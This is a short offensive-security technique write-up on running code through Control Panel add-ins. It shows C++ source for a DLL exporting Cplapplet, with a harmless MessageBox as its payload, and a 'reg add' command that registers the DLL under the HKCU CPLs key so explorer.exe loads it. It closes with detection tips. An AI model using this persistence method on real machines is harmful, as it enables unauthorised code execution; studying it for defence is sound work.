Code Execution through Control Panel Add-ins
It's possible to force explorer.exe to load your DLL that is compiled as a Control Panel Item and is registered as a Control Panel Add-in.
This technique could also be considered for persistence.

Execution

Let's compile our control panel item (which is a simple DLL with an exported function Cplapplet) from the below code:
1
#include <Windows.h>
2
#include "pch.h"
3
4
//Cplapplet
5
extern "C" __declspec(dllexport) LONG Cplapplet(
6
HWND hwndCpl,
7
UINT msg,
8
LPARAM lParam1,
9
LPARAM lParam2
10
)
11
{
12
MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);
13
return 1;
14
}
15
16
BOOL APIENTRY DllMain(HMODULE hModule,
17
DWORD ul_reason_for_call,
18
LPVOID lpReserved
19
)
20
{
21
switch (ul_reason_for_call)
22
{
23
case DLL_PROCESS_ATTACH:
24
{
25
Cplapplet(NULL, NULL, NULL, NULL);
26
}
27
case DLL_THREAD_ATTACH:
28
case DLL_THREAD_DETACH:
29
case DLL_PROCESS_DETACH:
30
break;
31
}
32
return TRUE;
33
}
Copied!
Let's now register our control panel item as an add-in (defenders beware of these registry modifications):
1
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs" /v spotless /d "C:\labs\cplAddin\cplAddin\x64\Release\cplAddin2.dll" /f
Copied!
Now, whenever the Control Panel is opened, our DLL will be injected into explorer.exe and our code will execute:
Below shows that our DLL is injected into explorer.exe:

Detection

  • Look for modifications in the following registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\CPLs
  • Look for / prevent DLLs from loading from unsecure locations

References